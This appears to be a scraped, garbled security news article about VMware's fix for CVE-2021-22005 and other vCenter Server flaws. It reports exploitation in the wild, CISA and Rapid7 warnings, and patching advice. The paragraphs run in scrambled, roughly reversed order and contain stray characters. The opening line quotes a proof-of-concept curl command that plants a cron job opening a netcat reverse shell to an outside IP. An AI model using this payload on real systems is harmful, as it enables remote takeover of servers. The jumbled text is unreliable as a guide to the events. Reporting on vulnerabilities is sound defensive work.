Unredacted RCE PoC against CEIP below.Ĭurl -kv "$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" /bwjMA21ifA PT):Ī working exploit for CVE-2021-22005 is now available and being used by attackers:ĬVE-2021-22005: Exploitation in the wild confirmed. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,” warns the US federal agency. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. “On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet,” he added.Ī very thorough Q&A document regarding these vulnerabilities and updates is available here. “While there are currently no reports of exploitation, we expect this to quickly change within days - just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972).
Rapid7’s Glenn Thorpe also recommends admins to patch right away.
“Patching vCenter Server is much more straightforward, can be done via API or UI, does not introduce human error, does not create other operational concerns, and should already be an established process in an organization.” Just using UNIX text editors can be a challenge,” the company explained. Workarounds also tend to be more challenging for vSphere Admins who do not have deep UNIX experience. They rely on editing files and changing vSphere in ways that are not intended and might cause serious issues if errors are made. “At best, workarounds are temporary solutions to buy a short amount of time until patching can commence. The only workaround offered is for CVE-2021-22005, the rest of the security holes require a patch to be closed.
What to do?Īs noted before, VMware urges administrators to consult the advisory, ascertain which version of the solutions they are using, and upgrade to a fixed version as soon as possible. These can allow attackers to esclate privileges, access restricted endpoints, manipulate VM network settings, gain access to sensitive information, execute malicious scripts, delete non critical files, and create a denial of service condition. “The other issues have lower CVSS scores but still may be usable to an attacker that is already inside your organization’s network,” the company explained. A malicious actor with network access to port 443 on vCenter Server could exploit it by uploading a specially crafted file.
The vulnerabilities affect vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x.ĬVE-2021-22005 – the most critical one, with a CVSS score of 9.8 – is an arbitrary file upload vulnerability in the Analytics service, which can be used to execute commands and software on the vCenter Server Appliance. The offered security updates fix 19 vulnerabilities in all, most of which have been reported by George Noseevich and Sergey Gerasimov of SolidLab LLC. VMware Cloud Foundation is a hybrid cloud platform that provides software-defined services for compute, storage, networking, security and cloud management to run enterprise apps in private or public environments.
It can be installed on a Windows machine or a preconfigured Linux version (i.e., the vCenter Server Appliance). VMware vCenter Server is software that allows administrators to provision, monitor, orchestrate, and control their VMware vSphere deployments (virtual machines) from a centralized location. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.” About VMware vCenter Server and Cloud Foundation With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. “The ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available. “This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company noted. VMware has fixed 19 vulnerabilities affecting VMware vCenter Server and VMware Cloud Foundation, the most critical of which is CVE-2021-22005.